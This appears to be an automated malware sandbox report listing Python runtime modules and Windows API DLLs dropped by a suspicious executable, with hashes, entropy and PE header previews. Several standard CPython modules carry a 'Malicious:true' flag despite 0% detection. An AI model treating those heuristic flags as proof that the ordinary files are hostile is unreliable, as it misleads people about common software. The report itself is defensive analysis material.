                                                                                                                                                                                                                        MD5:0E675D4A7A5B7CCD69013386793F68EB
                                                                                                                                                                                                                        SHA1:6E5821DDD8FEA6681BDA4448816F39984A33596B
                                                                                                                                                                                                                        SHA-256:BF5FF4603557C9959ACEC995653D052D9054AD4826DF967974EFD2F377C723D1
                                                                                                                                                                                                                        SHA-512:CAE69A90F92936FEBDE67DACD6CE77647CB3B3ED82BB66463CD9047E90723F633AA2FC365489DE09FECDC510BE15808C183B12E6236B0893AF19633F6A670E66
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............x.D.x.D.x.D..AD.x.D..=D.x.D.x.D.x.Dx..E.x.Dx..E.x.Dx..E.x.Dx..E.x.Dx..E.x.Dx.QD.x.Dx..E.x.DRich.x.D........PE..d....}.Y.........." .........T...............................................`.......Y....`A........................................p...4............@.......0..(.... ...>...P..p.......8...........................@................................................text...$........................... ..`.rdata...6.......8..................@..@.data...0.... ......................@....pdata..(....0......................@..@.rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\_bz2.pyd

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):84040
                                                                                                                                                                                                                        Entropy (8bit):6.41469022264903
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:SSpo7/9ZwseNsUQJ8rbXis0WwOpcAE+8aoBnuRtApxbBVZIG4VJyI:SSW7lZws+bLwOpvEZa+uRWVVZIG4VF
                                                                                                                                                                                                                        MD5:3DC8AF67E6EE06AF9EEC52FE985A7633
                                                                                                                                                                                                                        SHA1:1451B8C598348A0C0E50AFC0EC91513C46FE3AF6
                                                                                                                                                                                                                        SHA-256:C55821F5FDB0064C796B2C0B03B51971F073140BC210CBE6ED90387DB2BED929
                                                                                                                                                                                                                        SHA-512:DA16BFBC66C8ABC078278D4D3CE1595A54C9EF43AE8837CEB35AE2F4757B930FE55E258827036EBA8218315C10AF5928E30CB22C60FF69159C8FE76327280087
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H.1.).b.).b.).b.Qib.).b.A.c.).bM.=b.).b.A.c.).b.A.c.).b.A.c.).bD@.c.).b.O.c.).b.).b.).bD@.c.).bD@.c.).bD@.b.).bD@.c.).bRich.).b................PE..d.....].........." .........f......t........................................p.......a....`.............................................H............P.......@..(.......H....`......p...T...............................................8............................text...>........................... ..`.rdata..~A.......B..................@..@.data........0......................@....pdata..(....@......................@..@.rsrc........P....... ..............@..@.reloc.......`.......,..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\_ctypes.pyd

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):123464
                                                                                                                                                                                                                        Entropy (8bit):5.886703955852103
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:qpG85kJGmH3c+5M333KvUPzeENGLf3Tz4ccUZw1IGVPE:qDSGT+5+KMPzyLf3TEcKu
                                                                                                                                                                                                                        MD5:F1E33A8F6F91C2ED93DC5049DD50D7B8
                                                                                                                                                                                                                        SHA1:23C583DC98AA3F6B8B108DB5D90E65D3DD72E9B4
                                                                                                                                                                                                                        SHA-256:9459D246DF7A3C638776305CF3683946BA8DB26A7DE90DF8B60E1BE0B27E53C4
                                                                                                                                                                                                                        SHA-512:229896DA389D78CBDF2168753ED7FCC72D8E0E62C6607A3766D6D47842C0ABD519AC4F5D46607B15E7BA785280F9D27B482954E931645337A152B8A54467C6A5
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U..4..4..4..L@..4..\..4..\..4..\..4..\..4..]..4..R..4..R..4..]..4..4.i4..]..4..]..4..],..4..]..4.Rich.4.........PE..d.....].........." .................]....................................................`..........................................`......$a..........................H...........0...T...............................................`............................text............................... ..`.rdata..0l.......n..................@..@.data....>.......:...l..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\_hashlib.pyd

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):45640
                                                                                                                                                                                                                        Entropy (8bit):5.996546047346997
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:8skeCps0iszzPFrGE/CBAdIPGV03ju774xxIGsIx7WDG4yw:81eCpLzDBZ+AdIPmYju7OxIGsIxWyw
                                                                                                                                                                                                                        MD5:A6448BC5E5DA21A222DE164823ADD45C
                                                                                                                                                                                                                        SHA1:6C26EB949D7EB97D19E42559B2E3713D7629F2F9
                                                                                                                                                                                                                        SHA-256:3692FC8E70E6E29910032240080FC8109248CE9A996F0A70D69ACF1542FCA69A
                                                                                                                                                                                                                        SHA-512:A3833C7E1CF0E4D181AC4DE95C5DFA685CF528DC39010BF0AC82864953106213ECCFF70785021CCB05395B5CF0DCB89404394327CD7E69F820D14DFA6FBA8CBA
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2..&v.uv.uv.u...ur.u$..tt.u$..t}.u$..t~.u$..tt.u...tt.u.ts.uv.u..u.tw.u.tw.u.iuw.u.tw.uRichv.u................PE..d.....].........." .....@...Z......X2...............................................7....`..........................................u..P...@v..........................H............X..T...........................`X...............P...............................text....?.......@.................. ..`.rdata..p3...P...4...D..............@..@.data...h............x..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\_lzma.pyd

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):252488
                                                                                                                                                                                                                        Entropy (8bit):6.080982550390949
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:bkHDwqjhhwYbOqQNEkT/4OQhJwAbHoqLNvka/gOFhUw6b4qCNxkV/3OdhAWwPbGE:bd7/IbtSKOt
                                                                                                                                                                                                                        MD5:37057C92F50391D0751F2C1D7AD25B02
                                                                                                                                                                                                                        SHA1:A43C6835B11621663FA251DA421BE58D143D2AFB
                                                                                                                                                                                                                        SHA-256:9442DC46829485670A6AC0C02EF83C54B401F1570D1D5D1D85C19C1587487764
                                                                                                                                                                                                                        SHA-512:953DC856AD00C3AEC6AEAB3AFA2DEB24211B5B791C184598A2573B444761DB2D4D770B8B807EBBA00EE18725FF83157EC5FA2E3591A7756EB718EBA282491C7C
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0d..^7..^7..^7..7..^7.._6..^7..[6..^7..Z6..^7..]6..^7Q._6..^7.._6..^7.._7..^7Q.S6..^7Q.^6..^7Q..7..^7Q.\6..^7Rich..^7........PE..d.....].........." .................6..............................................o*....`............................................L.......x.......................H.......$...@...T............................................... ............................text............................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\_socket.pyd

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):78920
                                                                                                                                                                                                                        Entropy (8bit):6.061178831576516
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:KzMe79sDb+eGm08Vr5lcDAB9/s+7+pkaOz3CkNA9y1IGVwCyMPbi:de79u8/GFmAB9/se+pROz3jN1IGVw+Pm
                                                                                                                                                                                                                        MD5:D6BAE4B430F349AB42553DC738699F0E
                                                                                                                                                                                                                        SHA1:7E5EFC958E189C117ECCEF39EC16EBF00E7645A9
                                                                                                                                                                                                                        SHA-256:587C4F3092B5F3E34F6B1E927ECC7127B3FE2F7FA84E8A3D0C41828583BD5CEF
                                                                                                                                                                                                                        SHA-512:A8F8FED5EA88E8177E291B708E44B763D105907E9F8C9E046C4EEBB8684A1778383D1FBA6A5FA863CA37C42FD58ED977E9BB3A6B12C5B8D9AB6EF44DE75E3D1E
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........1..._..._..._....._...^.._...Z..._...[..._...\.._.a.^.._...^.._...^.B._.a.R..._.a._..._.a..._.a.]..._.Rich.._.................PE..d.....].........." .....x..........h........................................`.......2....`.............................................P...0........@.......0..........H....P.........T...........................@................................................text....v.......x.................. ..`.rdata...v.......x...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-console-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20248
                                                                                                                                                                                                                        Entropy (8bit):7.035406046605262
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:iWEhWL4+QpBj0HRN7aebXQHRN7LgkSIlexkdT:Qv+qWaM8V6U
                                                                                                                                                                                                                        MD5:B56D69079D2001C1B2AF272774B53A64
                                                                                                                                                                                                                        SHA1:67EDE1C5A71412B11847F79F5A684EABAF00DE01
                                                                                                                                                                                                                        SHA-256:F3A41D882544202B2E1BDF3D955458BE11FC7F76BA12668388A681870636F143
                                                                                                                                                                                                                        SHA-512:7EB8FE111DD2E1F7E308B622461EB311C2B9FC4EF44C76E1DEF6C524EB7281D5522AF12211F1F91F651F2B678592D2997FE4CD15724F700DEAFF314A1737B3A8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0...........`.........................................`...+............ ...................A..............8............................................................................rdata..@...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-datetime-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):19736
                                                                                                                                                                                                                        Entropy (8bit):7.0443036655888225
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:vWEhW/4+QpBj0HRN7TQHRN7Gp1x09lge9://+qWT8Gps9
                                                                                                                                                                                                                        MD5:5AF784F599437629DEEA9FE4E8EB4799
                                                                                                                                                                                                                        SHA1:3C891B920FD2703EDD6881117EA035CED5A619F6
                                                                                                                                                                                                                        SHA-256:7E5BD3EE263D09C7998E0D5FFA684906DDC56DA61536331C89C74B039DF00C7C
                                                                                                                                                                                                                        SHA-512:4DF58513CF52511C0D2037CDC674115D8ED5A0ED4360EB6383CC6A798A7037F3F7F2D587797223ED7797CCD476F1C503B3C16E095843F43E6B87D55AD4822D70
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......ey....`.........................................`................ ...................A..............8............................................................................rdata..$...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-debug-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):19736
                                                                                                                                                                                                                        Entropy (8bit):7.049693596229206
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:UPWEhWcHHV/McJW65FdQpBjSdHnhWgN7a8WckW65FdQHnhWgN7a8WshFoodqnajK:wWEhWmJ7QpBj0HRN7GQHRN7FhSIlexEk
                                                                                                                                                                                                                        MD5:E1CA15CF0597C6743B3876AF23A96960
                                                                                                                                                                                                                        SHA1:301231F7250431BD122B12ED34A8D4E8BB379457
                                                                                                                                                                                                                        SHA-256:990E46D8F7C9574A558EBDFCB8739FBCCBA59D0D3A2193C9C8E66807387A276D
                                                                                                                                                                                                                        SHA-512:7C9DACD882A0650BF2F553E9BC5647E6320A66021AC4C1ADC802070FD53DE4C6672A7BACFD397C51009A23B6762E85C8017895E9347A94D489D42C50FA0A1C42
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..0...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):19736
                                                                                                                                                                                                                        Entropy (8bit):7.0758779488098416
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:FvfC5WEhWllQpBj0HRN77lQHRN7QSkclsHd/:Fi5uqWB8Q7/
                                                                                                                                                                                                                        MD5:8D6599D7C4897DCD0217070CCA074574
                                                                                                                                                                                                                        SHA1:25EACAAA4C6F89945E97388796A8C85BA6FB01FB
                                                                                                                                                                                                                        SHA-256:A011260FAFAAAEFD7E7326D8D5290C6A76D55E5AF4E43FFA4DE5FEA9B08FA928
                                                                                                                                                                                                                        SHA-512:E8E2E7C5BFF41CCAA0F77C3CFEE48DAC43C11E75688F03B719CC1D716DB047597A7A2CE25B561171EF259957BDCD9DD4345A0E0125DB2B36F31698BA178E2248
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0.......j....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):23320
                                                                                                                                                                                                                        Entropy (8bit):6.972639549935684
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:2BPvVX7WEhWXqEQpBj0HRN7UQHRN7mSIlexb:+PvVXDqHqWU8m6l
                                                                                                                                                                                                                        MD5:642B29701907E98E2AA7D36EBA7D78B8
                                                                                                                                                                                                                        SHA1:16F46B0E057816F3592F9C0A6671111EA2F35114
                                                                                                                                                                                                                        SHA-256:5D72FEAC789562D445D745A55A99536FA9302B0C27B8F493F025BA69BA31941C
                                                                                                                                                                                                                        SHA-512:1BEAB2B368CC595BEB39B2F5A2F52D334BC42BF674B8039D334C6D399C966AFF0B15876105F0A4A54FA08E021CB44907ED47D31A0AF9E789EB4102B82025CF57
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................@............`.........................................`................0...................A..............8............................................................................rdata..............................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l1-2-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):19736
                                                                                                                                                                                                                        Entropy (8bit):7.053716052760641
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:9ZWEhWwqEQpBj0HRN7xnE77QHRN7ICMlly:9ZJHqWNE778r
                                                                                                                                                                                                                        MD5:F0C73F7454A5CE6FB8E3D795FDB0235D
                                                                                                                                                                                                                        SHA1:ACDD6C5A359421D268B28DDF19D3BCB71F36C010
                                                                                                                                                                                                                        SHA-256:2A59DD891533A028FAE7A81E690E4C28C9074C2F327393FAB17329AFFE53FD7B
                                                                                                                                                                                                                        SHA-512:BD6CF4E37C3E7A1A3B36F42858AF1B476F69CAA4BA1FD836A7E32220E5EFF7CCC811C903019560844AF988A7C77CC41DC6216C0C949D8E04516A537DA5821A3E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0...........`.........................................`...L............ ...................A..............8............................................................................rdata..\...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l2-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):19736
                                                                                                                                                                                                                        Entropy (8bit):7.113839950805383
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:IVxWEhWnqEQpBj0HRN7HQHRN7YAXAXOVlTS:IVh6HqWH8lAH
                                                                                                                                                                                                                        MD5:7D4D4593B478B4357446C106B64E61F8
                                                                                                                                                                                                                        SHA1:8A4969C9E59D7A7485C8CC5723C037B20DEA5C9D
                                                                                                                                                                                                                        SHA-256:0A6E2224CDE90A0D41926E8863F9956848FFBF19848E8855BD08953112AFC801
                                                                                                                                                                                                                        SHA-512:7BC9C473705EC98BA0C1DA31C295937D97710CEDEFC660F6A5CB0512BAE36AD23BEBB2F6F14DF7CE7F90EC3F817B02F577317FDD514560AAB22CB0434D8E4E0B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...).NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-handle-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):19736
                                                                                                                                                                                                                        Entropy (8bit):7.052601866399419
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:XWEhW2lQpBj0HRN7NkhXQHRN7vnR1lp1x09lgerA:37qWw8vRnpss
                                                                                                                                                                                                                        MD5:7BC1B8712E266DB746914DB48B27EF9C
                                                                                                                                                                                                                        SHA1:C76EB162C23865B3F1BD7978F7979D6BA09CCB60
                                                                                                                                                                                                                        SHA-256:F82D05AEA21BCF6337EF45FBDAD6D647D17C043A67B44C7234F149F861A012B9
                                                                                                                                                                                                                        SHA-512:DB6983F5F9C18908266DBF01EF95EBAE49F88EDC04A0515699EF12201AC9A50F09939B8784C75AE513105ADA5B155E5330BD42D70F8C8C48FE6005513AEFAD2A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0.......r....`.........................................`..._............ ...................A..............8............................................................................rdata..t...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-heap-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20248
                                                                                                                                                                                                                        Entropy (8bit):7.028564065154355
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:nZlrPWEhWcrIAjW65FdQpBjSdHnhWgN7a8WcA+0W65FdQHnhWgN7a8W1P5mzVEMW:ZlzWEhWKFQpBj0HRN7JGQHRN7rCMllq
                                                                                                                                                                                                                        MD5:B071E761CEA670D89D7AE80E016CE7E6
                                                                                                                                                                                                                        SHA1:C675BE753DBEF1624100F16674C2221A20CF07DD
                                                                                                                                                                                                                        SHA-256:63FB84A49308B857804AE1481D2D53B00A88BBD806D257D196DE2BD5C385701E
                                                                                                                                                                                                                        SHA-512:F2ECBDABA3516D92BD29DCCE618185F1755451D95C7DBBE23F8215318F6F300A9964C93EC3ED65C5535D87BE82B668E1D3025A7E325AF71A05F14E15D530D35F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):19736
                                                                                                                                                                                                                        Entropy (8bit):7.064651561006373
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:DPWEhWcAQIqyW65FdQpBjSdHnhWgN7a8WcnKW65FdQHnhWgN7a8WwFoodqnajqxB:LWEhWFqEQpBj0HRN7XsQHRN7XSIlex7N
                                                                                                                                                                                                                        MD5:1DCCF27F2967601CE6666C8611317F03
                                                                                                                                                                                                                        SHA1:D8246DF2ED9EC4A8A719FD4B1DB4FD8A71EF679B
                                                                                                                                                                                                                        SHA-256:6A83AB9A413AFD74D77A090F52784B0128527BEE9CB0A4224C59D5C75FC18387
                                                                                                                                                                                                                        SHA-512:70B96D69D609211F8B9E05FA510EA7D574AE8DA3A6498F5C982AEE71635B8A749162247055B7BA21A884BFA06C1415B68912C463F0F1B6FFB9049F3532386877
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0...........`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20248
                                                                                                                                                                                                                        Entropy (8bit):7.078698929399523
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:GvuBL3BXWEhWfnhLvQpBj0HRN7YQ3QHRN7Tp1x09lgek/:xBL3B3shLvqWYQ38Tps6
                                                                                                                                                                                                                        MD5:569A7AC3F6824A04282FF708C629A6D2
                                                                                                                                                                                                                        SHA1:FC0D78DE1075DFD4C1024A72074D09576D4D4181
                                                                                                                                                                                                                        SHA-256:84C579A8263A87991CA1D3AEE2845E1C262FB4B849606358062093D08AFDC7A2
                                                                                                                                                                                                                        SHA-512:E9CBFF82E32540F9230CEAD9063ACB1ACEB7CCC9F3338C0B7AD10B0AC70FF5B47C15944D0DCE33EA8405554AA9B75DE30B26AE2CA55DB159D45B6E64BC02A180
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
